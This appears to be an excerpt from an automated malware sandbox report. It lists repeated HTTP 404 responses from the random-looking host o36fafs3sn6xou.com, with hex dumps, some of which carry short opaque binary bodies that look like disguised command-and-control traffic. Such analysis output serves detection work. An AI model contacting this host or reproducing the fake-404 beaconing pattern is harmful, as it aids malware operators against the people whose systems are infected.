Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:04 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 85Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4a 1b f2 d1 25 fa f4 1b 33 9d ef 95 ba 22 b1 8d df ac 35 85 47 bd aa 20 25 c6 77 1e 8d 1a 3e e4 95 c1 4a d5 b3 18 c6 c7 93 b1 6f f0 5d 64 a2 99 c1 cf c1 e2 19 96 6c f3 3f ec 8d a5 Data Ascii: %S`Nh&WQY^J%3"5G %w>Jo]dl?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:04 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 104Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e9 8a ac f7 a3 19 42 b9 c4 65 fa e8 1a 75 96 e6 89 f6 20 b2 8c 99 b2 7e b5 42 92 a3 47 69 cf 77 50 9a 4e 68 bf d6 96 5c d0 b0 1c df 95 c4 f3 35 a4 04 37 fe c5 ba ee e2 d0 30 a8 42 df 75 fa 80 b0 6c 04 70 0b 41 ca 42 87 51 52 ae 61 c1 11 9e 12 a8 4c 50 Data Ascii: %S`Nh&WQY^Beu ~BGiwPNh\570BulpABQRaLP
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 46Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 40 b2 d0 f6 a0 e0 54 18 e8 86 65 a4 ac 45 75 9c e3 87 bb 32 b1 8c 84 f2 68 b9 46 Data Ascii: %S`Nh&WQL@TeEu2hF
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:11 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 48Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 d5 f9 72 b4 a6 8a f3 4c ef 46 86 aa Data Ascii: %S`Nh&WQY^L8?rLF
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:14 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 47Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e3 8c ac f0 ba 1e 46 af c4 32 fe b4 1e 35 9c a5 93 f3 3b ae 91 9d e5 23 a4 5b 9b Data Ascii: %S`Nh&WQY^F25;#[
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:20 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:21 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 79Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ff 91 b9 fb a5 1c 4c ae 9e 38 fd b5 1a 3f 85 a5 92 c7 2b 8c b9 b8 f3 3c f8 42 c9 f6 0c 7d db 77 57 8f 4a 65 e0 98 93 4b da fb 1e c9 90 cf e1 69 ff 0e 61 af 80 f3 b2 a3 c2 26 a1 Data Ascii: %S`Nh&WQY^L8?+<B}wWJeKia&
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 39Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 49 b2 cd ea a5 ee 54 18 ec 87 65 a7 ab 4b 75 c0 a4 83 ec 24 Data Ascii: %S`Nh&WQLITeKu$
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:26 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:27 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 85Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4a 1d f2 d1 25 fa f4 1b 33 9d ef 95 ba 22 b1 8d df eb 3d ae 1a 90 ac 21 2e c6 23 1e dd 18 36 e6 98 91 4b d3 b3 18 c6 c7 93 bc 6f f0 53 66 aa 99 c7 cd c8 e1 0d 80 6c e6 3f ec 8d a5 Data Ascii: %S`Nh&WQY^J%3"=!.#6KoSfl?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:27 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 31Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e fe cd ac fa f9 4c 6f ac c5 03 d4 Data Ascii: %S`Nh&WQY^Lo
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba fe 18 39 9e ee 83 e6 70 e7 d8 c9 f3 5a a0 4f 92 aa 1c 33 cd 72 46 c1 46 67 b9 cf 88 31 91 e7 59 84 94 cf aa 3e b0 0e Data Ascii: %S`Nh&WQY^&9pZO3rFFg1Y>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:30 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:31 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:31 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba fe 18 39 9e ee 83 e6 70 e7 d8 c9 f3 5a a0 4f 92 aa 1c 33 cd 72 46 c1 46 67 b9 cf 88 31 91 e7 59 84 94 cf aa 3e b0 0e Data Ascii: %S`Nh&WQY^&9pZO3rFFg1Y>
